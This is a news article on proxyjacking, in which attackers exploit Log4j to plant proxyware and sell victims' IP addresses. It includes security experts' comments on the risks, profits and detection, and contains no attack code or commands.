Online raiders are stealing IP addresses and converting them to cash by selling them to so-called proxyware services.
Malicious actors are planting proxyware on computers without the owner’s knowledge, then selling the unit’s IP address to a proxyware service, making as much as US$10 a month for every compromised device, the threat research team at Sysdig reported Tuesday.
Proxyware services allow a user to make money by sharing their internet connection with others, the researchers explained in a company blog. Attackers, however, are leveraging the platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems.
“Proxyware services are legitimate, but they cater to people who want to bypass protections and restrictions,” observed Michael Clark, director of threat research at Sysdig, a San Francisco-based maker of a SaaS platform for threat detection and response.
“They use residential addresses to bypass bot protection,” he told TechNewsWorld.
For example, buying up a lot of a sneaker brand can be very profitable, but websites put in protections to limit a sale to a single pair to an IP address, he explained. They use these proxy IP addresses to buy and resell as many pairs as possible.
“Sites also trust residential IP addresses more than other kinds of addresses,” he added. “That’s why there’s such a premium on residential addresses, but cloud services and mobile phones are also starting to be desirable for these services.”
Food for Influencers
These apps are often promoted via referral programs, with many notable “influencers” promoting them for passive income opportunities, said Immanuel Chavoya, the senior manager of product security at SonicWall, a network firewall maker in Milpitas, Calif.
“The income-seekers download the software to share their bandwidth and make money,” he told TechNewsWorld.
“However,” he continued, “these proxyware services can expose users to disproportionate levels of risks, as the users cannot control the activities performed using their home and mobile IP addresses.”
“There have been instances of users or their infrastructure unwittingly becoming involved in criminal activity,” he added.
Such activity includes accessing potential click-fraud or silent advertisement sites, SQL injection probing, attempts to access the critical /etc/passwd file on Linux and Unix systems (that keeps track of registered users with access to a system), crawling government websites, crawling of personally identifiable information — including national IDs and social security numbers — and bulk registration of social media accounts.
Timothy Morris, chief security advisor at Tanium, a maker of an endpoint management and security platform in Kirkland, Wash., pointed out that proxyware services can be used to generate web traffic or manipulate web search results.
“Some proxy clients will come with ‘bonus content’ that can be ‘trojanized,’ or malicious, providing unauthorized use of the computer running the proxy service, typically for crypto mining,” he told TechNewsWorld.
Organizations infested with proxyware can see their cloud platform management costs increase and see service degradation, noted Sysdig Threat Research Engineer Crystal Morin.
“And just because there’s an attacker doing crypto mining or proxyjacking on your network, that doesn’t mean that’s all that they’re doing,” she told TechNewsWorld.
“There’s a concern that if they’re using Log4j or any other vulnerability, and they have access to your network,” she continued, “they could be doing something beyond using the system for profit, so you have to take precautions and look for other malicious activity.”
Clark added that an organization could face some reputational risks from proxyjacking, too.
“There could be illegal activity going on that could be attributed to a company or organization whose IP was taken, and they could end up on a deny list for threat intelligence services, which could lead to a whole host of problems if people stop dropping the victim’s internet connections,” he said.
“There’s also potential law enforcement investigations that could occur,” he noted.
He added that the proxyjacking activity uncovered by the Sysdig researchers was aimed at organizations. “The attackers cast a wide net over the whole internet and targeted cloud infrastructure,” he said.
“Usually,” he continued, “we’d see this kind of attack bundled in Windows adware. This time we’re seeing cloud networks and servers targeted, which is more business oriented.”
Log4j Vulnerability Exploited
The attackers studied by the Sysdig researchers exploited the Log4j vulnerability to compromise their targets. That flaw in a popular open-source Java-based logging utility discovered in 2021 is estimated to have affected 93% of all enterprise cloud environments.
“Millions of systems are still running with vulnerable versions of Log4j, and according to Censys, more than 23,000 of those are reachable from the internet,” the researchers wrote.
“Log4j is not the only attack vector for deploying proxyjacking malware, but this vulnerability alone could theoretically provide more than $220,000 in profit per month,” they added. “More conservatively, a modest compromise of 100 IPs will net a passive income of nearly $1,000 per month.”
While it shouldn’t be an issue, there is still a “long tail” of systems vulnerable to the Log4J vulnerability that hasn’t been patched, observed Mike Parkin, a senior technical engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation in Tel Aviv, Israel.
“The number of vulnerable systems keeps going down, but it’ll still be a while before it reaches zero — either from all of the remaining ones being patched or the remaining ones being found and exploited,” he told TechNewsWorld.
“The vulnerability is being actively exploited,” Morris added. “There are also reports of vulnerable version still being downloaded.”
Protect Through Detection
To protect themselves from proxyjacking, Morin recommended strong and continuous real-time threat detection.
“Unlike cryptojacking, where you’ll see spikes in CPU use, the CPU usage is pretty minimal here,” she explained. “So, the best way to detect this is through detection analytics, where you’re looking for the kill chain aspects of the attack — initial access, vulnerability exploitation, detection evasion, persistence.”
Chavoya advised organizations to create granular rules through application whitelisting for which types of applications are permissible on end-user devices.
Whitelisting involves creating a list of approved applications that can be run on devices within the organization’s network and blocking any other applications from running.
“This can be a highly effective way to prevent proxyware and other types of malware from running on devices within an organization’s network,” Chavoya said.
“By creating granular rules for which types of applications are permissible on end-user devices, organizations can ensure that only authorized and necessary applications are allowed to run,” he continued.
“This can greatly reduce the risk of proxyjacking and other types of cyberattacks that rely on unauthorized applications running on end-user devices,” he concluded.